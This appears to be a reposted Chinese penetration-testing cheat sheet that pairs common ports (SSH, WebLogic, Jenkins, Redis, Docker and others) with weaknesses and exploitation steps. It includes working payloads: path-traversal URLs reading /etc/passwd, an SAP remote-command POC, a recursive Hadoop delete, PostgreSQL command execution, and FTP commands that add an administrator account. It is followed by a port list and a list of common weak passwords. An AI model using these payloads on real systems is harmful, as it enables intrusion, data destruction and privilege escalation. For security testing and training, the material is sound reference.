常見網路埠(PORT)滲透(駭入) 黑客/駭客筆錄
常見網路埠(PORT)滲透(駭入) 黑客/駭客筆錄
資料來源: https://mp.weixin.qq.com/s?__biz=MzIyMDEzMTA2MQ==&mid=2651152240&idx=2&sn=e1b8a38c01fad8f8eff13f2cec336495&chksm=8c2144eabb56cdfcd5dee4f42cf10a0c211809e0690002700eb9a353a292e2302ed741aa79fb&scene=126&sessionid=1595899253&key=7674ee21d747fecfee13314359d8dcaf941b76129d8b14810c9931aee608651749897386282787e8e14ed7129fb963a6380650d9d026eff44decb6f81991930167f9d59ab0490ccc3440035a55ce7c1b&ascene=1&uin=MjIwODk2NDgxNw%3D%3D&devicetype=Windows+10+x64&version=62090529&lang=zh_TW&exportkey=AtbU4kZzI3ZKKWMU45%2Bev4s%3D&pass_ticket=JJEmjBpPvJCtmH9Wn54FpB%2BhYrxSxNTlT3OneYBMt3NEAMfnleETJFjmG943cHJ5
1、遠程管理埠
22 埠(SSH)
安全攻擊:弱口令、暴力猜解、用戶名枚舉
利用方式:
1、通過用戶名枚舉可以判斷某個用戶名是否存在於目標主機中,
2、利用弱口令/暴力破解,獲取目標主機許可權。
23 埠(Telnet)
安全性漏洞:弱口令、明文傳輸
利用方式:
1、通過弱口令或暴力破解,獲取目標主機許可權。
2、嗅探抓取telnet明文帳戶密碼。
3389 埠(RDP)
安全性漏洞:暴力破解
利用方式:通過弱口令或暴力破解,獲取目標主機許可權。
5632 埠(Pcanywhere)
安全性漏洞:弱口令、暴力破解
利用方式:通過弱口令或暴力破解,獲取目標主機許可權
5900 埠(VNC)
安全性漏洞:弱口令、暴力破解
利用方式:通過弱口令或暴力破解,獲取目標主機許可權。
2、Web中間件/服務埠
1090/1099 埠(RMI)
安全性漏洞:JAVA RMI 反序列化遠端命令執行漏洞
利用方式:使用nmap檢測埠資訊。
埠資訊:1099/1090 Java-rmi Java RMI Registry
檢測工具:attackRMI.jar
7001 埠(Weblogic)
安全性漏洞:弱口令、SSRF、反序列化漏洞
利用方式:
1、控制台弱口令上傳war木馬
2、SSRF內網探測
3、反序列化遠端代碼執行等
8000 埠(jdwp)
安全性漏洞:JDWP 遠端命令執行漏洞
埠資訊:
8000 jdwp java Debug Wire Protocol
檢測工具:https://github.com/IOActive/jdwp-shellifier
8080 埠(Tomcat)
安全性漏洞:弱口令、示例目錄
利用方式:通過弱口令登錄控制台,上傳war包。
8080 埠(Jboss)
安全性漏洞:未授權訪問、反序列化。
利用方式:
1、未授權存取控制台,遠端部署木馬
2、反序列化導致遠端命令執行等。
檢測工具:https://github.com/joaomatosf/jexboss
8080 埠(Resin)
安全性漏洞:目錄遍歷、遠端檔讀取
利用方式:通過目錄遍歷/遠端檔讀取獲取敏感資訊,為進一步攻擊提供必要的資訊。
任意文件讀取POC:
payload1 = “/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd”
payload2 = “/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd”
payload3 = “/ ..\\\\web-inf”
8080 埠(Jetty)
安全性漏洞:遠程共用緩衝區洩漏
利用方式:攻擊者可以通過精心構造headers值來觸發異常並偏移到共用緩衝區,其中包含了之前其他用戶提交的請求,伺服器會根據攻擊者的payload返回特定位置的資料。
檢測工具:https://github.com/GDSSecurity/Jetleak-Testing-Script
8080 埠(GlassFish)
安全性漏洞:弱口令、任意檔讀取
利用方式:
1、弱口令admin/admin,直接部署shell
2、任意檔讀取獲取伺服器敏感配置資訊
8080 埠(Jenkins)
安全性漏洞:未授權訪問 、遠端代碼執行
利用方式:訪問如下url,可以執行指令碼命令,反彈shell,寫入webshell等。
http://<target>:8080/manage
http://<target>:8080/script
8161 埠(ActiveMQ)
安全性漏洞:弱口令、任意檔寫入、反序列化
利用方式:預設密碼admin/admin登陸控制台、寫入webshell、上傳ssh key等方式。
9043 埠(webSphere)
安全性漏洞:控制台弱口令、遠端代碼執行
後臺地址:https://:9043/ibm/console/logon.jsp
50000 埠(SAP)
安全性漏洞:遠端代碼執行
利用方式:攻擊者通過構造url請求,實現遠端代碼執行。
POC:http://<target>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all
50070 埠(hadoop)
安全性漏洞:未授權訪問
利用方式:攻擊者可以通過命令列操作多個目錄下的資料,如進行刪除操作。
curl -i -X DELETE “http://ip:50070/webhdfs/v1/tmp?op=DELETE&recursive=true“
curl -i -X PUT “http://ip:50070/webhdfs/v1/NODATA4U_SECUREYOURSHIT?op=MKDIRS“
3、數據庫埠
389 埠(ldap)
安全性漏洞:未授權訪問 、弱口令
利用方式:通過LdapBrowser工具直接連入。
1433 埠(Mssql)
安全性漏洞:弱口令、暴力破解
利用方式:差異備份getshell、SA帳戶提權等
1521 埠(Oracle)
安全性漏洞:弱口令、暴力破解
利用方式:通過弱口令/暴力破解進行入侵。
3306 埠(MySQL)
安全性漏洞:弱口令、暴力破解
利用方式:利用日誌寫入webshell、udf提權、mof提權等。
5432 埠( PostgreSQL)
安全性漏洞:弱口令、高許可權命令執行
利用方式:攻擊者通過弱口令獲取帳號資訊,連入postgres中,可執行系統命令。。
PoC參考:
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM ‘id’;
SELECT * FROM cmd_exec;
5984 埠(CouchDB)
安全性漏洞:垂直許可權繞過、任意命令執行
利用方式:通過構造資料創建管理員使用者,使用管理員用戶登錄,構造惡意請求觸發任意命令執行。
後臺訪問:http://<target>:5984/_utils
6379 埠(Redis)
安全性漏洞:未授權訪問
利用方式:絕對路徑寫webshell 、利用計畫任務執行命令反彈shell、
公私密金鑰認證獲取root許可權、主從複製RCE等。
9200 埠(elasticsearch)
安全性漏洞:未授權訪問、命令執行
檢測方式:
1、直接訪問如下url,獲取相關敏感資訊。
http://<target>:9200/_nodes 查看節點資料
http://<target>:9200/_river 查看資料庫敏感資訊
2、通過構造特定的資料包,執行任意命令。
11211 埠(MemCache)
安全性漏洞:未授權訪問
檢測方式:無需用戶名密碼,可以直接連接memcache 服務的11211埠。
nc -vv <target> 11211
27017 埠(Mongodb)
安全性漏洞:未授權訪問、弱口令
利用方式:未授權訪問/弱口令,遠端連入資料庫,導致敏感資訊洩露。
4、常見協議埠
21 埠(FTP)
安全性漏洞:1、配置不當 2、明文傳輸 3、協力廠商軟體提權
利用方式:
1、匿名登入或弱口令
2、嗅探ftp用戶名和密碼
3、Serv-U許可權較大的帳號可導致系統命令執行。FTP提權命令:
# 增加系統使用者
Quote site exec net user 4567 4567 /add
# 提升到管理員許可權
Quote site exec net localgroup administrators 4567 /add
25 埠(SMTP)
攻擊方式:1、匿名張貼郵件 2、弱口令 3、SMTP用戶枚舉
利用方式:
1、SMTP伺服器配置不當,攻擊者可以使用任意用戶發送郵件。
2、SMTP弱口令掃描,獲取使用者帳號密碼,發送郵件釣魚。
3、通過SMTP用戶枚舉獲取用戶名:
nmap -p 25 — smtp-enum-users.nse <target>
53 埠(DNS)
安全攻擊:1、DNS域傳送漏洞、DNS欺騙、DNS緩存投毒
檢測方式:
1、DNS域傳送漏洞,Windows下檢測使用nslookup命令,Linux下檢測使用dig命令,通過執行命令可以清楚的看到功能變數名稱解析情況。
2、DNS欺騙就是攻擊者冒充功能變數名稱伺服器的一種欺騙行為。
3、DNS緩存投毒是攻擊者欺騙DNS伺服器相信偽造的DNS回應的真實性。
161 埠(SNMP)
安全性漏洞:默認團體名/弱口令訪問
利用方式:通過nmap自帶的審計腳本進行檢測,可能導致敏感資訊洩露。。
1、弱口令檢測:nmap –sU –p161 –script=snmp-brute <target>
2、獲取系統資訊:nmap –sU –p161 –script=snmp-sysdescr <target>
3、獲取使用者資訊:nmap -sU -p161 –script=snmp-win32-user <target>
4、獲取網路埠狀態:nmap -sU -p161 –script=snmp-netstat <target>
443 埠(SSL)
安全性漏洞:OpenSSL 心臟出血
利用方式:攻擊者可以遠端讀取存在漏洞版本的openssl伺服器記憶體中長大64K的資料。
掃描腳本:nmap -sV –script=ssl-heartbleed <target>
445 埠(SMB)
安全性漏洞:資訊洩露、遠端代碼執行
利用方式:可利用共用獲取敏感資訊、緩衝區溢位導致遠端代碼執行,如ms17010。
873 埠(Rsync)
安全性漏洞:匿名訪問、弱口令
利用方式:攻擊者可以執行下載/上傳等操作,也可以嘗試上傳webshell。
1、下載:#rsync -avz a.b.c.d::path/file path/filiname
2、上傳:#rsync -avz path/filename a.b.c.d::path/file
2181 埠(Zookeeper)
安全性漏洞:未授權訪問
檢測方式:攻擊者可通過執行envi命令獲得系統大量的敏感資訊,包括系統名稱、Java環境。
echo envi | nc ip port
2375 埠(Docker)
安全性漏洞:未授權方式
檢測方式:通過docker daemon api 執行docker命令。
#列出容器資訊,效果與docker ps -a 一致。
curl http://<target>:2375/containers/json
docker -H tcp://<target>:2375 start <Container Id>
2 thoughts on “常見網路埠(PORT)滲透(駭入) 黑客/駭客筆錄”
https://mp.weixin.qq.com/s?__biz=MzIxNjA5MTM2MA==&mid=2652439054&idx=2&sn=4714adbd1992db89a0d4a5f270e1da07&chksm=8c63fd81bb147497f507461ffcad3c3fabb8c697ec2cd0db74773383086cfc2ff6487bcc0223&scene=126&sessionid=1597974761&key=bf49e72a192178bf7c302f88ca04a3d726430fd89050195e565e8a785e7ef1739a4b2acc8efdd93813bf638cfd487387693f99a0c35d329ba0d175b6dd3a1a6ade1e9386aa06a4b48c973baf8e426093a23d876c428a342b92d6d72b9cd346770c4b6d158bc535c1fd1de46cc9c0206a043872d9535630c7ae668b30e03f0f66&ascene=1&uin=MjIwODk2NDgxNw%3D%3D&devicetype=Windows+10+x64&version=62090529&lang=zh_TW&exportkey=Ao8rFuK48Yc74vY%2FRhRJaps%3D&pass_ticket=ofsaBGmNz2arvIpXOhPN7mDM0kwKpPFQH3U9x9MGwb5U6IS0xkM%2Bh5xZFKCB15V7
1 tcpmux
7 echo
9 discard
11 systat
13 daytime
15 netstat
17 qotd
19 chargen
20 ftp data
21 ftp access
22 ssh
23 telnet
25 smtp
37 time
42 name
43 nicname
53 domain
77 priv-rjs
79 finger
87 ttylink
95 supdup
101 hostriame
102 iso-tsap
103 gppitnp
104 acr-nema
109 pop2
110 pop3
111 sunrpc
113 auth
115 sftp
117 uucp-path
119 nntp
123 NTP
135 loc-srv /epmap
139 netbios
143 imap2
179 BGP
389 ldap
465 smtp+ssl
512 print / exec
513 login
514 shell
515 printer
526 tempo
530 courier
531 chat
532 netnews
540 uucp
556 remotefs
563 nntp+ssl
587 stmp?
601 ??
636 ldap+ssl
993 ldap+ssl
995 pop3+ssl
2049 nfs
3659 apple-sasl / PasswordServer
4045 lockd
6000 X11
6665 Alternate IRC [Apple addition]
6666 Alternate IRC [Apple addition]
6667 Standard IRC [Apple addition]
6668 Alternate IRC [Apple addition]
6669 Alternate IRC [Apple addition]
這15組「超常見密碼」易遭駭客破解 資安專家:快改掉[駭客/黑客 暴力破解 預先 測試]
https://www.msn.com/zh-tw/news/world/%E9%80%9915%E7%B5%84-%E8%B6%85%E5%B8%B8%E8%A6%8B%E5%AF%86%E7%A2%BC-%E6%98%93%E9%81%AD%E9%A7%AD%E5%AE%A2%E7%A0%B4%E8%A7%A3-%E8%B3%87%E5%AE%89%E5%B0%88%E5%AE%B6-%E5%BF%AB%E6%94%B9%E6%8E%89/ar-BB1hi5hX
據悉,懷斯列出的15組高危險性密碼包括「123456」、「123456789」、「admin」、「Qwerty」、「welcome」、「Password」、「Password1」、「p@ssw0rd」、「12345」、「Qwerty123」、「1q2w3e」、「12345678」、「111111」、「1234567890」和「Q2w3e4r5t」。